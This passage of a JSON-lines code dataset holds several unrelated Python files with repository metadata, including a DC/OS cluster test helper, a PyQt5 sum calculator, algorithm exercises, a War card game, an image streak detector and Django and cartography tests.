check_leds():\n\tGPIO.setmode(GPIO.BCM)\n\tGPIO.setup(enemy_pin,GPIO.OUT)\n\tGPIO.setup(friend_pin,GPIO.OUT)\n\n\tGPIO.output(enemy_pin,1)\n\tGPIO.output(friend_pin,1)\n\ttime.sleep(1)\n\tGPIO.output(enemy_pin,0)\n\tGPIO.output(friend_pin,0)\n\t\n\tGPIO.cleanup()\n","repo_name":"Ravichandran-Arunagiri/Autonomous_Grid_Navigating_Robot","sub_path":"cam_tagdetection.py","file_name":"cam_tagdetection.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19792722696","text":"import copy\nimport logging\nimport os\nfrom urllib.parse import urlparse\n\nimport dns.exception\nimport 
dns.resolver\nimport requests\nimport retrying\n\nimport test_util.helpers\nimport test_util.marathon\n\nADMINROUTER_PORT_MAPPING = {\n 'master': {'http': 80, 'https': 443},\n 'agent': {'http': 61001, 'https': 61002}}\n\n\ndef get_args_from_env():\n \"\"\"Does basic sanity checks and returns args converted\n from strings to python data types\n \"\"\"\n assert 'DCOS_DNS_ADDRESS' in os.environ\n assert 'MASTER_HOSTS' in os.environ\n assert 'PUBLIC_MASTER_HOSTS' in os.environ\n assert 'SLAVE_HOSTS' in os.environ\n assert 'PUBLIC_SLAVE_HOSTS' in os.environ\n assert 'DNS_SEARCH' in os.environ\n assert 'DCOS_PROVIDER' in os.environ\n\n # must be true or false (prevents misspellings)\n assert os.environ['DNS_SEARCH'] in ['true', 'false']\n\n assert os.environ['DCOS_PROVIDER'] in ['onprem', 'aws', 'azure']\n\n return {\n 'dcos_url': os.environ['DCOS_DNS_ADDRESS'],\n 'masters': os.environ['MASTER_HOSTS'].split(','),\n 'public_masters': os.environ['PUBLIC_MASTER_HOSTS'].split(','),\n 'slaves': os.environ['SLAVE_HOSTS'].split(','),\n 'public_slaves': os.environ['PUBLIC_SLAVE_HOSTS'].split(','),\n 'dns_search_set': os.environ['DNS_SEARCH'] == 'true',\n 'provider': os.environ['DCOS_PROVIDER'],\n 'auth_enabled': os.getenv('DCOS_AUTH_ENABLED', 'true') == 'true',\n 'default_os_user': os.getenv('DCOS_DEFAULT_OS_USER', 'root'),\n 'ca_cert_path': os.getenv('DCOS_CA_CERT_PATH', None)}\n\n\nclass ClusterApi(test_util.helpers.ApiClient):\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_marathon_up(self):\n r = self.get('/marathon/ui/')\n # resp_code >= 500 -> backend is still down probably\n if r.status_code < 500:\n logging.info(\"Marathon is probably up\")\n return True\n else:\n msg = \"Waiting for Marathon, resp code is: {}\"\n logging.info(msg.format(r.status_code))\n return False\n\n @retrying.retry(wait_fixed=1000)\n def _wait_for_zk_quorum(self):\n \"\"\"Queries exhibitor to ensure all master ZKs have joined\n \"\"\"\n r = self.get('/exhibitor/exhibitor/v1/cluster/status')\n if not r.ok:\n logging.warning('Exhibitor status not available')\n r.raise_for_status()\n status = r.json()\n logging.info('Exhibitor cluster status: {}'.format(status))\n zk_nodes = sorted([n['hostname'] for n in status])\n assert zk_nodes == self.masters, 'ZooKeeper has not formed the expected quorum'\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_slaves_to_join(self):\n r = self.get('/mesos/master/slaves')\n if r.status_code != 200:\n msg = \"Mesos master returned status code {} != 200 \"\n msg += \"continuing to wait...\"\n logging.info(msg.format(r.status_code))\n return False\n data = r.json()\n # Check that there are all the slaves the test knows about. 
They are all\n # needed to pass the test.\n num_slaves = len(data['slaves'])\n if num_slaves >= len(self.all_slaves):\n msg = \"Sufficient ({} >= {}) number of slaves have joined the cluster\"\n logging.info(msg.format(num_slaves, self.all_slaves))\n return True\n else:\n msg = \"Current number of slaves: {} < {}, continuing to wait...\"\n logging.info(msg.format(num_slaves, self.all_slaves))\n return False\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_dcos_history_up(self):\n r = self.get('/dcos-history-service/ping')\n # resp_code >= 500 -> backend is still down probably\n if r.status_code <= 500:\n logging.info(\"DC/OS History is probably up\")\n return True\n else:\n msg = \"Waiting for DC/OS History, resp code is: {}\"\n logging.info(msg.format(r.status_code))\n return False\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_dcos_history_data(self):\n ro = self.get('/dcos-history-service/history/last')\n # resp_code >= 500 -> backend is still down probably\n if ro.status_code <= 500:\n logging.info(\"DC/OS History is probably getting data\")\n json = ro.json()\n assert len(json[\"slaves\"]) == len(self.all_slaves)\n return True\n else:\n msg = \"Waiting for DC/OS History, resp code is: {}\"\n logging.info(msg.format(ro.status_code))\n return False\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_leader_election(self):\n mesos_resolver = dns.resolver.Resolver()\n mesos_resolver.nameservers = self.public_masters\n mesos_resolver.port = 61053\n try:\n # Yeah, we can also put it in retry_on_exception, but\n # this way we will loose debug messages\n mesos_resolver.query('leader.mesos', 'A')\n except dns.exception.DNSException as e:\n msg = \"Cannot resolve leader.mesos, error string: '{}', continuing to wait\"\n logging.info(msg.format(e))\n return False\n else:\n logging.info(\"leader.mesos dns entry is UP!\")\n return True\n\n @retrying.retry(wait_fixed=1000,\n retry_on_result=lambda ret: ret is False,\n retry_on_exception=lambda x: False)\n def _wait_for_adminrouter_up(self):\n try:\n # Yeah, we can also put it in retry_on_exception, but\n # this way we will loose debug messages\n self.get('/')\n except requests.ConnectionError as e:\n msg = \"Cannot connect to nginx, error string: '{}', continuing to wait\"\n logging.info(msg.format(e))\n return False\n else:\n logging.info(\"Nginx is UP!\")\n return True\n\n # Retry if returncode is False, do not retry on exceptions.\n @retrying.retry(wait_fixed=2000,\n retry_on_result=lambda r: r is False,\n retry_on_exception=lambda _: False)\n def _wait_for_srouter_slaves_endpoints(self):\n # Get currently known agents. This request is served straight from\n # Mesos (no AdminRouter-based caching is involved).\n r = self.get('/mesos/master/slaves')\n assert r.status_code == 200\n\n data = r.json()\n # only check against the slaves we expect to be in the cluster\n # so we can check that cluster has returned after a failure\n # in which case will will have new slaves and dead slaves\n slaves_ids = sorted(x['id'] for x in data['slaves'] if x['hostname'] in self.all_slaves)\n\n for slave_id in slaves_ids:\n # AdminRouter's slave endpoint internally uses cached Mesos\n # state data. That is, slave IDs of just recently joined\n # slaves can be unknown here. For those, this endpoint\n # returns a 404. 
Retry in this case, until this endpoint\n # is confirmed to work for all known agents.\n uri = '/slave/{}/slave%281%29/state.json'.format(slave_id)\n r = self.get(uri)\n if r.status_code == 404:\n return False\n assert r.status_code == 200\n data = r.json()\n assert \"id\" in data\n assert data[\"id\"] == slave_id\n\n @retrying.retry(wait_fixed=2000,\n retry_on_result=lambda r: r is False,\n retry_on_exception=lambda _: False)\n def _wait_for_metronome(self):\n r = self.get('/service/metronome/v1/jobs')\n # 500 and 504 are the expected behavior of a service\n # backend that is not up and running.\n if r.status_code == 500 or r.status_code == 504:\n logging.info(\"Metronome gateway timeout, continue waiting for backend...\")\n return False\n assert r.status_code == 200\n\n def wait_for_dcos(self):\n self._wait_for_leader_election()\n self._wait_for_adminrouter_up()\n if self.auth_enabled and self.web_auth_default_user:\n self._authenticate_default_user()\n self._wait_for_marathon_up()\n self._wait_for_zk_quorum()\n self._wait_for_slaves_to_join()\n self._wait_for_dcos_history_up()\n self._wait_for_srouter_slaves_endpoints()\n self._wait_for_dcos_history_data()\n self._wait_for_metronome()\n\n @retrying.retry(wait_fixed=2000, stop_max_delay=120 * 1000)\n def _authenticate_default_user(self):\n \"\"\"retry default auth user because in some deployments,\n the auth endpoint might not be routable immediately\n after adminrouter is up. DcosUser.authenticate()\n will raise exception if authorization fails\n \"\"\"\n self.web_auth_default_user.authenticate(self)\n self.default_headers.update(self.web_auth_default_user.auth_header)\n\n def __init__(self, dcos_url, masters, public_masters, slaves, public_slaves,\n dns_search_set, provider, auth_enabled, default_os_user,\n web_auth_default_user=None, ca_cert_path=None):\n \"\"\"Proxy class for DC/OS clusters.\n\n Args:\n dcos_url: address for the DC/OS web UI.\n masters: list of Mesos master advertised IP addresses.\n public_masters: list of Mesos master IP addresses routable from\n the local host.\n slaves: list of Mesos slave/agent advertised IP addresses.\n dns_search_set: string indicating that a DNS search domain is\n configured if its value is \"true\".\n provider: onprem, azure, or aws\n auth_enabled: True or False\n default_os_user: default user that marathon/metronome will launch tasks under\n web_auth_default_user: if auth_enabled, use this user's auth for all requests\n Note: user must be authenticated explicitly or call self.wait_for_dcos()\n ca_cert_path: (str) optional path point to the CA cert to make requests against\n \"\"\"\n # URL must include scheme\n assert dcos_url.startswith('http')\n parse_result = urlparse(dcos_url)\n self.scheme = parse_result.scheme\n self.dns_host = parse_result.netloc.split(':')[0]\n\n # Make URL never end with /\n self.dcos_url = dcos_url.rstrip('/')\n\n super().__init__(\n default_host_url=self.dcos_url,\n api_base=None,\n ca_cert_path=ca_cert_path,\n get_node_url=self.get_node_url)\n self.masters = sorted(masters)\n self.public_masters = sorted(public_masters)\n self.slaves = sorted(slaves)\n self.public_slaves = sorted(public_slaves)\n self.all_slaves = sorted(slaves + public_slaves)\n self.zk_hostports = ','.join(':'.join([host, '2181']) for host in self.public_masters)\n self.dns_search_set = dns_search_set\n self.provider = provider\n self.auth_enabled = auth_enabled\n self.default_os_user = default_os_user\n self.web_auth_default_user = web_auth_default_user\n\n assert len(self.masters) == 
len(self.public_masters)\n\n def get_user_session(self, user):\n \"\"\"Returns a copy of self with auth headers set for user\n \"\"\"\n new_session = copy.deepcopy(self)\n # purge old auth headers\n if self.web_auth_default_user is not None:\n for k in self.web_auth_default_user.auth_header.keys():\n if k in new_session.default_headers:\n del new_session.default_headers[k]\n # if user is given then auth and update the headers\n new_session.web_auth_default_user = user\n if user is not None:\n new_session._authenticate_default_user()\n return new_session\n\n def get_node_url(self, node, port=None):\n \"\"\"\n Args:\n node: (str) the hostname of the node to be requested from, if node=None,\n then public cluster address (see environment DCOS_DNS_ADDRESS)\n port: (int) port to be requested at. If port=None, the default port\n for that given node type will be used\n Returns:\n fully-qualified URL string for this API\n \"\"\"\n if node in self.masters:\n role = 'master'\n elif node in self.all_slaves:\n role = 'agent'\n else:\n raise Exception('Node {} is not recognized within the DC/OS cluster'.format(node))\n if port is None:\n port = ADMINROUTER_PORT_MAPPING[role][self.scheme]\n # do not explicitly declare default ports\n if (port == 80 and self.scheme == 'http') or (port == 443 and self.scheme == 'https'):\n netloc = node\n else:\n netloc = '{}:{}'.format(node, port)\n return '{}://{}'.format(self.scheme, netloc)\n\n @property\n def marathon(self):\n marathon_client = test_util.marathon.Marathon(\n default_host_url=self.dcos_url,\n default_os_user=self.default_os_user,\n default_headers=self.default_headers,\n ca_cert_path=self.ca_cert_path,\n get_node_url=self.get_node_url)\n return marathon_client\n\n @property\n def metronome(self):\n return self.get_client('/service/metronome/v1')\n\n @property\n def logs(self):\n return self.get_client('/system/v1/logs')\n\n def metronome_one_off(self, job_definition, timeout=300, ignore_failures=False):\n \"\"\"Run a job on metronome and block until it returns success\n \"\"\"\n job_id = job_definition['id']\n\n @retrying.retry(wait_fixed=2000, stop_max_delay=timeout * 1000,\n retry_on_result=lambda ret: not ret,\n retry_on_exception=lambda x: False)\n def wait_for_completion():\n r = self.metronome.get('jobs/' + job_id, params={'embed': 'history'})\n r.raise_for_status()\n out = r.json()\n if not ignore_failures and (out['history']['failureCount'] != 0):\n raise Exception('Metronome job failed!: ' + repr(out))\n if out['history']['successCount'] != 1:\n logging.info('Waiting for one-off to finish. 
Status: ' + repr(out))\n return False\n logging.info('Metronome one-off successful')\n return True\n logging.info('Creating metronome job: ' + repr(job_definition))\n r = self.metronome.post('jobs', json=job_definition)\n r.raise_for_status()\n logging.info('Starting metronome job')\n r = self.metronome.post('jobs/{}/runs'.format(job_id))\n r.raise_for_status()\n wait_for_completion()\n logging.info('Deleting metronome one-off')\n r = self.metronome.delete('jobs/' + job_id)\n r.raise_for_status()\n","repo_name":"samchiang/DC-OS","sub_path":"test_util/cluster_api.py","file_name":"cluster_api.py","file_ext":"py","file_size_in_byte":15440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26261059034","text":"\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton, QToolTip, QLabel, QLineEdit\n\nclass Teste (QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.topo = 200\n self.esquerda = 120\n self.largura = 700\n self.altura = 600\n self.titulo = \"Primeiro teste\"\n\n self.caixa_texto = QLineEdit(self) # caixa de texto\n self.caixa_texto.move(260, 20)\n self.caixa_texto.resize(220, 36)\n\n self.caixa_texto1 = QLineEdit(self) # caixa de texto1\n self.caixa_texto1.move(260, 60)\n self.caixa_texto1.resize(220, 36)\n\n '''botao1 = QPushButton('Botao1', self)\n botao1.move(80, 200)\n botao1.resize(140, 64)\n botao1.setStyleSheet('QPushButton {font:bold;font-size:20px}')\n botao1.clicked.connect(self.botao1_click)'''\n\n botao_caixa = QPushButton('Mostar a soma ', self)\n botao_caixa.move(520, 460)\n botao_caixa.resize(160, 64)\n botao_caixa.setStyleSheet('QPushButton {font:bold;font-size:20px}')\n botao_caixa.clicked.connect(self.mostra_soma)\n\n '''botao2 = QPushButton('Botao2', self)\n botao2.move(280, 200)\n botao2.resize(140, 64)\n botao2.setStyleSheet('QPushButton {font:bold;font-size:20px}')\n botao2.clicked.connect(self.botao2_click)'''\n self.label_1 = QLabel(self)\n self.label_1.setText(\"Primeiro números: \")\n self.label_1.move(12, 24)\n self.label_1.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_1.resize(400, 25)\n\n self.label_2 = QLabel(self)\n self.label_2.move(12, 60)\n self.label_2.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_2.resize(400, 30)\n self.label_2.setText(\"Segundo número: \")\n\n self.label_caixa = QLabel(self)\n self.label_caixa.move(290, 300)\n self.label_caixa.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_caixa.resize(360, 45)\n self.label_caixa.setText(\"A soma dos numeros é: \")\n\n self.label_caixa = QLabel(self)\n self.label_caixa.move(586, 300)\n self.label_caixa.setStyleSheet('QLabel {font:bold;font-size:25px}')\n self.label_caixa.resize(360, 45)\n self.label_caixa.setText(\"\")\n\n self.carregarteste()\n\n def carregarteste(self):\n self.setGeometry(self.esquerda, self.topo, self.largura, self.altura)\n self.setWindowTitle(self.titulo)\n self.show()\n\n '''def botao1_click(self):\n print('O botao 1 foi clicado')\n self.label_1.setText(\"O botao 1 foi clicado\")'''\n\n def mostra_soma(self):\n primeiro_n = int(self.caixa_texto.text())\n segundo_n = int(self.caixa_texto1.text())\n soma = str(primeiro_n + segundo_n)\n self.label_caixa.setText(soma)\n #self.label_caixa.setText(conteudo2)\n print(primeiro_n)\n print(segundo_n)\n print(soma)\n\n '''def botao2_click(self):\n print('O botao 2 foi clicado')\n self.label_1.setText(\"O botao 2 foi clicado\")'''\n\naplicacao = QApplication(sys.argv)\nt = 
Teste()\nsys.exit(aplicacao.exec_())","repo_name":"Miguel-ectil/Meus-estudos","sub_path":"Estudo_Python/Testes, exemplos e aprendisagem/pyqt5.py","file_name":"pyqt5.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"75190282404","text":"'''\n    You are given N counters, initially set to 0, and you have two possible operations on them:\n    increase(X) - counter X is increased by 1,\n    max counter - all counters are set to the maximum value of any counter.\n    A non-empty array A of M integers is given. This array represents consecutive operations:\n\n    if A[K] = X, such that 1 ≤ X ≤ N, then operation K is increase(X),\n    if A[K] = N + 1 then operation K is max counter.\n    For example, given integer N = 5 and array A such that:\n\n    A[0] = 3\n    A[1] = 4\n    A[2] = 4\n    A[3] = 6\n    A[4] = 1\n    A[5] = 4\n    A[6] = 4\n    the values of the counters after each consecutive operation will be:\n\n    (0, 0, 1, 0, 0)\n    (0, 0, 1, 1, 0)\n    (0, 0, 1, 2, 0)\n    (2, 2, 2, 2, 2)\n    (3, 2, 2, 2, 2)\n    (3, 2, 2, 3, 2)\n    (3, 2, 2, 4, 2)\n    \n    https://app.codility.com/demo/results/trainingBQGKND-C77/\n'''\ndef solution(N, A):\n    aLen = len(A)\n    ansList = [0] * (N + 1)\n    ansLen = len(ansList)\n    maxValue = 0\n    offset = 0\n    for i in range(aLen):\n        if A[i] == (N + 1):\n            offset = maxValue\n        \n        if A[i] >= 1 and A[i] <= N:\n            # a max-counter operation may have set the offset, so resume from it instead of a plain ansList[A[i]] += 1\n            ansList[A[i]] = max( offset+1, ansList[A[i]]+1 )\n            if maxValue < ansList[A[i]]:\n                maxValue = ansList[A[i]]\n        \n    for i in range(1,ansLen):\n        if ansList[i] < offset:\n            ansList[i] = offset\n    \n    return ansList[1:]\n    \n\nA = [3,4,4,6,1,4,4]\nN = 5\nprint(solution(N, A))","repo_name":"dawidbo/algorithms","sub_path":"Codility/maxCounters.py","file_name":"maxCounters.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40944577459","text":"def pascal(nums_rows):\r\n    # nums_rows is the total no of rows in the pascal triangle\r\n    # creating a pascal triangle with 0 initially\r\n    tri = [[0]*k for k in range(1,nums_rows+1)]\r\n\r\n    # traversing the tri\r\n    for row in range(0,nums_rows):\r\n        for col in range(0,row + 1):\r\n            if col == 0 or col == (row):\r\n                tri[row][col] = 1\r\n            else:\r\n                tri[row][col] = tri[row-1][col-1] + tri[row-1][col]\r\n    return tri\r\n\r\n\r\n# checking the test case\r\nnum_rows = 5\r\nans = pascal(num_rows)\r\nfor row in range(0,num_rows):\r\n    for col in range(0,row+1):\r\n        print(ans[row][col],end=' ')\r\n    print('\\n')\r\n","repo_name":"Ranjit007ai/InterviewBit-ArrayBasedSolutions","sub_path":"Array_based_problems/pascal_triangle/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41879072698","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nN,M,S,T=list(map(int, input().split()))\nS-=1\nT-=1\ngraph_money = [[]*N for _ in range(N)]\ngraph_snuuke = [[] * N for _ in range(N)]\nfor _ in range(M):\n    u,v,a,b = list(map(int, input().split()))\n    u-=1\n    v-=1\n    graph_money[u].append([a,v])\n    graph_money[v].append([a,u])\n    graph_snuuke[u].append([b, v])\n    graph_snuuke[v].append([b, u])\nsum_money = [float('inf')]*N\nsum_snuuku = [float('inf')] * N\nh = [[0,S]]\nsum_money[S]=0\nsum_snuuku[T]=0\nheapq.heapify(h)\ncnt = 0\nwhile len(h) > 0:\n    cnt += 1\n    if cnt == N:break\n    m,t = heapq.heappop(h)\n    for money,e in graph_money[t]:\n        cost 
= m + money\n if sum_money[e] <= cost:continue\n sum_money[e]=cost\n heapq.heappush(h, [cost, e])\n\nh = [[0,T]]\nheapq.heapify(h)\ncnt = 0\nwhile len(h) > 0:\n cnt += 1\n if cnt == N:break\n s,t = heapq.heappop(h)\n for snuuku,e in graph_snuuke[t]:\n cost = s + snuuku\n if sum_snuuku[e] <= cost:continue\n sum_snuuku[e]=cost\n heapq.heappush(h, [cost, e])\nleft = 10**15\nmin_cost = float('inf')\nans = []\nfor i in reversed(range(N)):\n min_cost = min(min_cost, sum_money[i]+sum_snuuku[i])\n ans.append(left - min_cost)\nans.reverse()\nprint(*ans, sep='\\n')","repo_name":"tokumaru-y/competitive_program_python","sub_path":"antBook/first_problem/2/5/2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15572258049","text":"from game_war.player import Player\nfrom game_war.desk import Desk\nfrom game_war.card import Card\n\nplayer_one = Player(\"One\")\nplayer_two = Player(\"Two\")\n\n\nnew_desk = Desk()\nnew_desk.shuffle()\n\n\ngame_on = True\n\nround_num = 0\n\n\nfor x in range(26):\n player_one.add_cards(new_desk.deal_one())\n player_two.add_cards(new_desk.deal_one())\n\nprint(player_one.remove_one())\n\nwhile game_on:\n round_num += 1\n\n # Game over\n if len(player_one.all_card) == 0 or len(player_two.all_card) == 0:\n # Who win ?\n player_win = \"One\" if len(player_two.all_card) == 0 else \"Two\"\n Player_lose = \"One\" if len(player_one.all_card) == 0 else \"Two\"\n\n print(f\"Player {Player_lose}, out of cards! Player {player_win} Wins!\")\n break\n\n print(f\"Round {round_num}\")\n print(\"Fight\")\n # Player a new round\n # Show card to fight\n player_one_cards = []\n player_one_cards.append(player_one.remove_one())\n\n player_two_cards = []\n player_two_cards.append(player_two.remove_one())\n\n at_war = True\n\n while at_war:\n if player_one_cards[-1].value > player_two_cards[-1].value:\n # player 1 win round, Player One get all card was bet\n player_one.add_cards(player_one_cards)\n player_one.add_cards(player_two_cards)\n\n at_war = False\n \n elif player_one_cards[-1].value < player_two_cards[-1].value:\n # player 2 win round, Player One get all card was bet\n player_two.add_cards(player_one_cards)\n player_two.add_cards(player_two_cards)\n\n at_war = False\n else:\n print(\"WAR!\")\n\n if len(player_one.all_card) < 5:\n print(\"Player One unable to declare war\")\n print(\"PLAYER TWO WIN!\")\n game_on = False\n break\n elif len(player_two.all_card) < 5:\n print(\"Player TWO unable to declare war\")\n print(\"PLAYER ONE WIN!\")\n game_on = False\n break\n else:\n for num in range(5):\n player_one_cards.append(player_one.remove_one())\n player_two_cards.append(player_two.remove_one())\n break\n \n\n\n\n","repo_name":"phibang123/python_game_war","sub_path":"game_setup.py","file_name":"game_setup.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1884553504","text":"from load_tagcam import load_tagcam\nimport numpy as np\nfrom skimage.feature import canny\nfrom skimage.transform import probabilistic_hough_line\nfrom matplotlib import pyplot as plt\n\n__doc__ = \"\"\"\nIdentify potential streaks/particles in a set of images. 
The NavCam2 day 100 images exhibit a large number\nof streaks in the images and there is now a push to figure out the cause.\n\nPre-process the images with a canny edge detector and use a hough transformation to identify lines in the images.\n\"\"\"\n\n\ndef plot_lines(lines):\n for line in lines:\n (x0, y0), (x1, y1) = line\n plt.plot((x0, x1), (y0, y1))\n\n\ndef distance(point_one, point_two):\n \"\"\"The distance between two points\"\"\"\n x1, y1 = point_one\n x2, y2 = point_two\n return np.sqrt((x2 - x1)**2 + (y2-y1)**2)\n\n\ndef count_streaks(lines, dist=25):\n \"\"\" The hough transformation typically identifies multiple lines for a single streak. To count the individual\n streaks, only count lines that are a given distance from one another.\n\n\n :param lines: The lines identified by the hough transformation in format ((x0, y0), (x1, y1))\n :param dist: Distance in pixels\n :return: The number of streaks\n \"\"\"\n starting_points = [l[0] for l in lines]\n\n # First line will always be unique\n unique_points = [starting_points[0]]\n\n for sp in starting_points:\n unique = True\n\n for point in unique_points:\n if distance(sp, point) < dist:\n unique = False\n\n if unique:\n unique_points.append(sp)\n\n return len(unique_points)\n\n\ndef find_streaks(image):\n \"\"\" Identify potential streaks/particles in a set of images using canny edge detector and probabilistic hough lines\n\n :param image: The image to look for the streaks in\n :return: The number of streaks identified in the image\n \"\"\"\n # No sigma because if you smooth the image you'll lose the dim streaks\n edges = canny(image, sigma=0)\n\n lines = probabilistic_hough_line(edges, threshold=1, line_length=6,\n line_gap=1)\n\n if lines:\n # Plot the streaks on the image\n # plt.imshow(image, cmap='gray', interpolation='none')\n # plot_lines(lines)\n # plt.show()\n\n return count_streaks(lines)\n\n return 0\n\n# Example usage\nif __name__ == \"__main__\":\n\n directory = 'C:/Users/kalkiek/Desktop/repos/data/navcam2/DAY100/'\n\n navcam = load_tagcam([directory])\n\n for index, im in enumerate(navcam.images):\n streak_count = find_streaks(im)\n print(\"Index {0}: Streak Count {1}\".format(index, streak_count))\n","repo_name":"KenanA95/orex_scripts","sub_path":"find_streaks.py","file_name":"find_streaks.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11462131554","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom mediasoft.tests.factories import CityFactory\n\n\nclass CityTests(APITestCase):\n def test_view_cities(self):\n cities = CityFactory.create_batch(5)\n response = self.client.get(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n results = response.data.get(\"results\")\n results_list = [result[\"name\"] for result in results]\n for city in cities:\n self.assertIn(city.name, results_list)\n\n def test_view_cities_with_other_methods(self):\n response = self.client.post(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n response = self.client.put(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n response = self.client.delete(reverse(\"city-list\"), format=\"json\")\n self.assertEqual(response.status_code, 
status.HTTP_400_BAD_REQUEST)\n","repo_name":"ajib6ept/mediasoft-httpservice","sub_path":"mediasoft/tests/test_city.py","file_name":"test_city.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32986623851","text":"import cartography.intel.crxcavator.crxcavator\nimport tests.data.crxcavator.crxcavator\n\n\nTEST_UPDATE_TAG = 123456789\n\n\ndef _ensure_local_neo4j_has_test_extensions_data(neo4j_session):\n cartography.intel.crxcavator.crxcavator.load_extensions(\n tests.data.crxcavator.crxcavator.TRANSFORMED_EXTENSIONS_DATA,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n\ndef _ensure_local_neo4j_has_test_user_extensions_data(neo4j_session):\n cartography.intel.crxcavator.crxcavator.load_user_extensions(\n tests.data.crxcavator.crxcavator.TRANSFORMED_USER_DATA,\n tests.data.crxcavator.crxcavator.TRANSFORMED_USER_EXTENSION_DATA,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n\ndef test_transform_and_load_extensions(neo4j_session):\n \"\"\"\n Test that we can correctly transform and load ChromeExtension nodes to Neo4j.\n \"\"\"\n extension_res = tests.data.crxcavator.crxcavator.REPORT_RESPONSE\n extension_list = cartography.intel.crxcavator.crxcavator.transform_extensions(extension_res)\n cartography.intel.crxcavator.crxcavator.load_extensions(\n extension_list,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n query = \"\"\"\n MATCH(ext:ChromeExtension{id:$ExtensionId})\n RETURN\n ext.id,\n ext.extension_id,\n ext.version,\n ext.risk_total,\n ext.risk_metadata,\n ext.risk_permissions_score,\n ext.risk_webstore_score,\n ext.risk_csp_score,\n ext.risk_optional_permissions_score,\n ext.risk_extcalls_score,\n ext.risk_vuln_score,\n ext.address,\n ext.email,\n ext.icon,\n ext.crxcavator_last_updated,\n ext.name,\n ext.offered_by,\n ext.permissions_warnings,\n ext.privacy_policy,\n ext.rating,\n ext.rating_users,\n ext.short_description,\n ext.size,\n ext.support_site,\n ext.users,\n ext.website,\n ext.type,\n ext.price,\n ext.report_link\n \"\"\"\n expected_extension_id = 'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc|1.0'\n nodes = neo4j_session.run(\n query,\n ExtensionId=expected_extension_id,\n )\n actual_nodes = list(\n (\n n['ext.id'],\n n['ext.extension_id'],\n n['ext.version'],\n n['ext.risk_total'],\n n['ext.risk_metadata'],\n n['ext.risk_permissions_score'],\n n['ext.risk_webstore_score'],\n n['ext.risk_csp_score'],\n n['ext.risk_optional_permissions_score'],\n n['ext.risk_extcalls_score'],\n n['ext.risk_vuln_score'],\n n['ext.address'],\n n['ext.email'],\n n['ext.icon'],\n n['ext.crxcavator_last_updated'],\n n['ext.name'],\n n['ext.offered_by'],\n n['ext.permissions_warnings'],\n n['ext.privacy_policy'],\n n['ext.rating'],\n n['ext.rating_users'],\n n['ext.short_description'],\n n['ext.size'],\n n['ext.support_site'],\n n['ext.users'],\n n['ext.website'],\n n['ext.type'],\n n['ext.price'],\n n['ext.report_link'],\n ) for n in nodes\n )\n expected_nodes = list([\n (\n expected_extension_id,\n 'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc',\n '1.0',\n 344,\n '{}',\n 110,\n 12,\n 47,\n 85,\n 20,\n 80,\n '',\n '',\n 'https://lh3.googleusercontent.com/fake',\n '2016-02-22',\n 'CartographyIntegrationTest',\n '',\n ['Your data on all websites'],\n '',\n 4.6778846,\n 208,\n 'fake extension for Cartography integration testing',\n '13.95KiB',\n '',\n 38241,\n '',\n 'Extension',\n '',\n 'https://crxcavator.io/report/f06981cbc72a3c6e2e9e736cbdaef4865a4571bc/1.0',\n ),\n ])\n assert actual_nodes == 
